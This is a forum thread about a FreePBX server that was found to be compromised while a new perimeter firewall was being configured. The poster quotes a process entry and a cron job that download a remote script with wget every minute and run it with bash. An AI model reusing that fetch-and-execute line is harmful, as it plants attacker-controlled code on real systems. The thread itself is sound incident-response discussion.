I am doing some work relating to a new gateway router and perimeter firewall. While checking https connectivity from outside I happened to discover this using netstat:
# netstat -an | grep 80
tcp 0 0 192.168.6.9:41780 0.0.0.0:* LISTEN
tcp 0 1 192.168.6.9:42528 22.214.171.124:80 SYN_SENT
tcp 0 1 192.168.6.9:42522 126.96.36.199:80 SYN_SENT
tcp 0 1 192.168.6.9:42526 188.8.131.52:80 SYN_SENT
. . .
My question: What is freebsd doing connecting to that address?
That is malicious traffic specific to FreePBX – your machine has already been compromised.
Had your firewall not blocked it, the script would have retrieved more malicious code.
So I see this:
root 24718 1 0 12:18 ? 00:00:00 /bin/sh -c wget http://184.108.40.206/k.php -O /var/lib/asterisk/bin/devnull2;bash /var/lib/asterisk/bin/devnull2
Which is likely the compromise script running. How do I tell where is is running from?
That is interesting. I see this in cron:
*/1 * * * * wget http://220.127.116.11/k.php -O /var/lib/asterisk/bin/devnull2;bash /var/lib/asterisk/bin/devnull2
Your system is compromised, as @Stewart1 already said. Your best bet is to wipe and start over. You can attempt to cleanup but you are assuming that you are smarter/more determined than the bad guys.
This thread may be useful:
but I strongly agree with @adell4444 – start over.
Which of these are used by FreePBX?
Yes, I see the need to get this fixed with a scrub. But not in the middle of a workday.
sugarmaint supports and supermaint are all known to have been maliciously added. Take a read through the thread that was attached.
This topic was automatically closed 30 days after the last reply. New replies are no longer allowed.